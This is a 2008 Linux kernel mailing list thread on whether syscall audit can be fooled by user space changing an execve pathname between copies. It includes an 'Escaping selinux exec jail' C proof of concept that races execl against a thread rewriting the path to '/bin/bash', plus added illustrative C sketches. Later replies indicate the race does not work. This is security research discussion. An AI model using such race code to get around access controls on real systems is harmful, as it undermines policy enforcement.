System call audit

* System call audit
From: Mathieu Desnoyers @ 2008-05-13  0:06 UTC
  To: David Woodhouse, linux-kernel; +Cc: mingo

Hi David,

As I look into the system-wide system call tracing problem, I am
starting to wonder how auditsc deals with the fact that user space can
concurrently change the content referred to by __user pointers.

Take execve as an example. Suppose a program has two threads: one
executes execve() syscalls while the other modifies the user-space
string containing the name of the program to execute. Since there are
two copy_from_user() calls, one in auditsc and one in the real execve()
function, the string passed to the OS could differ from the string seen
by auditsc.
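
The concern can be modelled in plain user-space C. This is only a
sketch under stated assumptions: fetch_name() is a hypothetical stand-in
for copy_from_user(), and the concurrent writer is modelled as a
callback that runs between the two fetches so the outcome is
deterministic. None of these names come from the kernel.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define NAME_LEN 32

/* Hypothetical stand-in for copy_from_user(): one fetch of user memory. */
static void fetch_name(char *dst, const char *user)
{
	strncpy(dst, user, NAME_LEN - 1);
	dst[NAME_LEN - 1] = '\0';
}

/*
 * Fetch the name twice, with the "other thread" modelled as a callback
 * that runs between the two fetches. Returns 1 if the audited name and
 * the executed name differ, 0 if they match.
 */
static int double_fetch_differs(char *user, void (*racer)(char *))
{
	char audited[NAME_LEN];
	char executed[NAME_LEN];

	fetch_name(audited, user);	/* fetch 1: what the audit record sees */
	if (racer)
		racer(user);		/* writer changes the user string */
	fetch_name(executed, user);	/* fetch 2: what the exec path acts on */

	return strcmp(audited, executed) != 0;
}

/* Example writer: rewrites the first byte of the user string. */
static void flip_first_byte(char *user)
{
	user[0] = '/';
}
```

With a writer that runs between the fetches, the two copies disagree;
with no writer, they match.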

Regards,

Mathieu

-- 
Mathieu Desnoyers
OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F  BA06 3F25 A8FE 3BAE 9A68

* Re: System call audit
From: David Woodhouse @ 2008-05-13  9:24 UTC
  To: Mathieu Desnoyers; +Cc: linux-kernel, mingo

On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote:
> Hi David,
> 
> As I look into the system-wide system call tracing problem, I am
> starting to wonder how auditsc deals with the fact that user space can
> concurrently change the content referred to by __user pointers.

In general we have to copy the content into kernel space, audit it, and
then act on it from there. See the explanation on the IPC audit patch at
http://lwn.net/Articles/125350/ for example.

Auditing one thing and then acting on another would be simply broken.

> Take execve as an example. Suppose a program has two threads: one
> executes execve() syscalls while the other modifies the user-space
> string containing the name of the program to execute.

I was going to suggest that that attack vector won't work, because
execve() kills all threads. But all you have to do to avoid that is put
the data in question into a shared writable mmap and modify it from
another _process_. And in fact I suspect there's a combination of CLONE_
flags which would avoid the thread-killing behaviour anyway.
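
A minimal sketch of the shared-mapping variant, assuming Linux
(MAP_ANONYMOUS). The helper name child_write_visible_to_parent() is
hypothetical. It shows only that a write made by a separate process
through a MAP_SHARED mapping is visible to the process that created the
mapping, so the writer does not need to be a thread of the caller.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE		/* for MAP_ANONYMOUS under strict -std modes */
#endif
#include <assert.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define MAP_LEN 4096

/*
 * Returns 1 if a write done by a child process is visible to the parent
 * through a shared mapping, 0 if not, -1 on setup failure.
 */
static int child_write_visible_to_parent(void)
{
	char *shared;
	pid_t pid;
	int status;
	int visible;

	shared = mmap(NULL, MAP_LEN, PROT_READ | PROT_WRITE,
		      MAP_SHARED | MAP_ANONYMOUS, -1, 0);
	if (shared == MAP_FAILED)
		return -1;
	strcpy(shared, "$bin/bash");

	pid = fork();
	if (pid < 0) {
		munmap(shared, MAP_LEN);
		return -1;
	}
	if (pid == 0) {
		shared[0] = '/';	/* the other process rewrites the name */
		_exit(0);
	}

	/* Wait for the child so the result is deterministic. */
	if (waitpid(pid, &status, 0) < 0) {
		munmap(shared, MAP_LEN);
		return -1;
	}
	visible = (strcmp(shared, "/bin/bash") == 0);
	munmap(shared, MAP_LEN);
	return visible;
}
```

Here the parent waits for the child before reading; in a real race the
two would run concurrently.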

> Since there are two copy_from_user() calls, one in auditsc and one in
> the real execve() function, the string passed to the OS could differ
> from the string seen by auditsc.

Right. Don't Do That Then. The audit code should see what's _actually_
given to the child process. The audit/execve code has changed since I
last looked, but I think it's probably OK because it's reading the
contents of the new program's mm on the way back from the execve()
system call -- before ever giving the CPU back to that process.

-- 
dwmw2

* Re: System call audit
From: Mathieu Desnoyers @ 2008-05-13 12:51 UTC
  To: David Woodhouse; +Cc: linux-kernel, mingo

* David Woodhouse (dwmw2@infradead.org) wrote:
> I was going to suggest that that attack vector won't work, because
> execve() kills all threads. But all you have to do to avoid that is put
> the data in question into a shared writable mmap and modify it from
> another _process_. And in fact I suspect there's a combination of CLONE_
> flags which would avoid the thread-killing behaviour anyway.
> 

Even better: if execve() fails, it doesn't kill the threads. Therefore,
all we have to do is busy-loop on failing execve() calls and
atomically change the string to what we want executed. Can anyone
test the sample snippet on an SMP system where executing /bin/bash is
disallowed? I don't have an SELinux setup handy. I suppose that as
soon as SELinux sees one /bin/bash exec, it will kill the process, so a
few runs would be required to hit the race.


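/*
 * Escaping selinux exec jail
 *
 * build with gcc -o escape-selinux escape-selinux.c -lpthread
 *
 * Mathieu Desnoyers
 * License: GPL
 */

#include <stdio.h>
#include <pthread.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <signal.h>

/* Starts out as a path that does not exist; thr2 flips the first byte. */
static char modstring[] = "$bin/bash";

/* Retry the exec forever; a failed exec returns and the loop goes on. */
void *thr1(void *arg)
{
	while (1) {
		/* execl() needs argv[0] and a (char *)NULL terminator. */
		execl(modstring, modstring, (char *)NULL);
	}
	return ((void *)1);
}

/* Toggle the first byte between an invalid and a valid path. */
void *thr2(void *arg)
{
	/* volatile keeps the compiler from merging or dropping the stores. */
	volatile char *p = modstring;

	while (1) {
		p[0] = '$';
		p[0] = '/';
	}
	return ((void *)2);
}

int main(void)
{
	int err;
	pthread_t tid1, tid2;
	void *tret;

	err = pthread_create(&tid1, NULL, thr1, NULL);
	if (err != 0)
		exit(1);

	err = pthread_create(&tid2, NULL, thr2, NULL);
	if (err != 0)
		exit(1);

	sleep(10);

	/* Neither thread returns; the joins block until an exec succeeds. */
	err = pthread_join(tid1, &tret);
	if (err != 0)
		exit(1);

	err = pthread_join(tid2, &tret);
	if (err != 0)
		exit(1);

	return 0;
}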
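
The premise that a failed exec simply returns to the caller can be
checked in isolation. A small sketch, where try_exec() and the path used
with it are hypothetical: for an early failure such as a missing file,
execl() returns -1 and the calling process carries on, which is what
lets a retry loop keep running.

```c
#include <assert.h>
#include <errno.h>
#include <unistd.h>

/*
 * Attempt to exec `path`. On success this never returns. On failure the
 * calling process keeps running and the errno value that explains the
 * failure is returned.
 */
static int try_exec(const char *path)
{
	execl(path, path, (char *)NULL);
	return errno;	/* only reached when the exec failed */
}
```

Calling try_exec() on a path whose directory does not exist yields
ENOENT, and execution continues after the call.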


-- 
Mathieu Desnoyers
OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F  BA06 3F25 A8FE 3BAE 9A68

* Re: System call audit
From: David Woodhouse @ 2008-05-13 12:59 UTC
  To: Mathieu Desnoyers; +Cc: linux-kernel, mingo

On Tue, 2008-05-13 at 08:51 -0400, Mathieu Desnoyers wrote:
> Even better: if execve() fails, it doesn't kill the threads. Therefore,
> all we have to do is busy-loop on failing execve() calls and
> atomically change the string to what we want executed. Can anyone
> test the sample snippet on an SMP system where executing /bin/bash is
> disallowed? I don't have an SELinux setup handy.

You were talking about audit earlier. Now you seem to be talking about
selinux. 

-- 
dwmw2


* Re: System call audit
From: Mathieu Desnoyers @ 2008-05-13 13:12 UTC
  To: David Woodhouse; +Cc: linux-kernel, mingo

* David Woodhouse (dwmw2@infradead.org) wrote:
> You were talking about audit earlier. Now you seem to be talking about
> selinux. 
> 

I thought SELinux hooked into syscall audit? (Sorry, I am new to the
kernel auditing field.) The race I refer to is in the auditsc.c kernel
code, so syscall audit is what I am talking about. I mention SELinux
here only because, as I understand it, it happens to be one
module-based callback that can hook into syscall audit.

Mathieu

-- 
Mathieu Desnoyers
OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F  BA06 3F25 A8FE 3BAE 9A68

* Re: System call audit
From: Stephen Smalley @ 2008-05-13 13:12 UTC
  To: Mathieu Desnoyers; +Cc: David Woodhouse, linux-kernel, mingo


On Tue, 2008-05-13 at 08:51 -0400, Mathieu Desnoyers wrote:
> Even better: if execve() fails, it doesn't kill the threads. Therefore,
> all we have to do is busy-loop on failing execve() calls and
> atomically change the string to what we want executed. Can anyone
> test the sample snippet on an SMP system where executing /bin/bash is
> disallowed? I don't have an SELinux setup handy. I suppose that as
> soon as SELinux sees one /bin/bash exec, it will kill the process, so a
> few runs would be required to hit the race.

SELinux doesn't base any of its decisions on pathname strings provided
by the user (or pathnames at all, for that matter; SELinux is
attribute/label-based).
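
As a loose illustration of why a check tied to the object is unaffected
by rewriting the name string, the sketch below compares two pathnames by
the (device, inode) pair they resolve to. This is not SELinux code and
does not model security labels; same_object() is a hypothetical helper
that only shows that object identity is independent of how the name is
spelled.

```c
#include <assert.h>
#include <sys/stat.h>
#include <sys/types.h>

/*
 * Returns 1 if both pathnames resolve to the same file object, 0 if they
 * do not, and -1 if either lookup fails. Identity is taken from the
 * (device, inode) pair, not from the spelling of the name.
 */
static int same_object(const char *a, const char *b)
{
	struct stat sa, sb;

	if (stat(a, &sa) != 0 || stat(b, &sb) != 0)
		return -1;
	return sa.st_dev == sb.st_dev && sa.st_ino == sb.st_ino;
}
```

Two different strings such as "/" and "/." resolve to the same object,
so a decision attached to the object gives the same answer for both.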

-- 
Stephen Smalley
National Security Agency


* Re: System call audit
From: Stephen Smalley @ 2008-05-13 13:19 UTC
  To: Mathieu Desnoyers; +Cc: David Woodhouse, linux-kernel, mingo


On Tue, 2008-05-13 at 09:12 -0400, Mathieu Desnoyers wrote:
> I thought SELinux hooked into syscall audit? (Sorry, I am new to the
> kernel auditing field.) The race I refer to is in the auditsc.c kernel
> code, so syscall audit is what I am talking about. I mention SELinux
> here only because, as I understand it, it happens to be one
> module-based callback that can hook into syscall audit.

SELinux is a user of the audit subsystem in terms of generating audit
messages for permission denials.  It doesn't rely on any inputs from the
audit subsystem.

-- 
Stephen Smalley
National Security Agency


* Re: System call audit
From: Mathieu Desnoyers @ 2008-05-13 13:51 UTC
  To: David Woodhouse; +Cc: linux-kernel, mingo

* David Woodhouse (dwmw2@infradead.org) wrote:
> You were talking about audit earlier. Now you seem to be talking about
> selinux. 
> 

Actually, getname()/putname() seem to make sure the name is copied only
once per audit context, so it should be OK.
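
The idea of copying once per context can be sketched in user-space C.
This is a model under stated assumptions, not the kernel's getname() or
putname(): struct syscall_ctx, ctx_getname() and ctx_putname() are
hypothetical names, and the buffer size is arbitrary. The first request
copies the user string in a single pass; later requests within the same
context get the stored copy, so every consumer sees the same bytes.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define CTX_NAME_LEN 64

/* Hypothetical per-syscall context that remembers the copied name. */
struct syscall_ctx {
	char name[CTX_NAME_LEN];
	int have_name;		/* set once the name has been copied */
	unsigned int fetches;	/* how many times user memory was read */
};

/*
 * Return the context's copy of the name, reading user memory only on
 * the first call. Returns NULL if the name does not fit.
 */
static const char *ctx_getname(struct syscall_ctx *ctx,
			       const volatile char *user)
{
	if (!ctx->have_name) {
		size_t i;

		/* Single pass: each byte of user memory is read once. */
		for (i = 0; i < CTX_NAME_LEN; i++) {
			char c = user[i];

			ctx->name[i] = c;
			if (c == '\0')
				break;
		}
		if (i == CTX_NAME_LEN)
			return NULL;
		ctx->have_name = 1;
		ctx->fetches++;
	}
	return ctx->name;
}

/* Drop the stored copy at the end of the syscall. */
static void ctx_putname(struct syscall_ctx *ctx)
{
	ctx->have_name = 0;
}
```

If the user string changes after the first ctx_getname() call, a second
call in the same context still returns the original copy.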

Mathieu

-- 
Mathieu Desnoyers
OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F  BA06 3F25 A8FE 3BAE 9A68
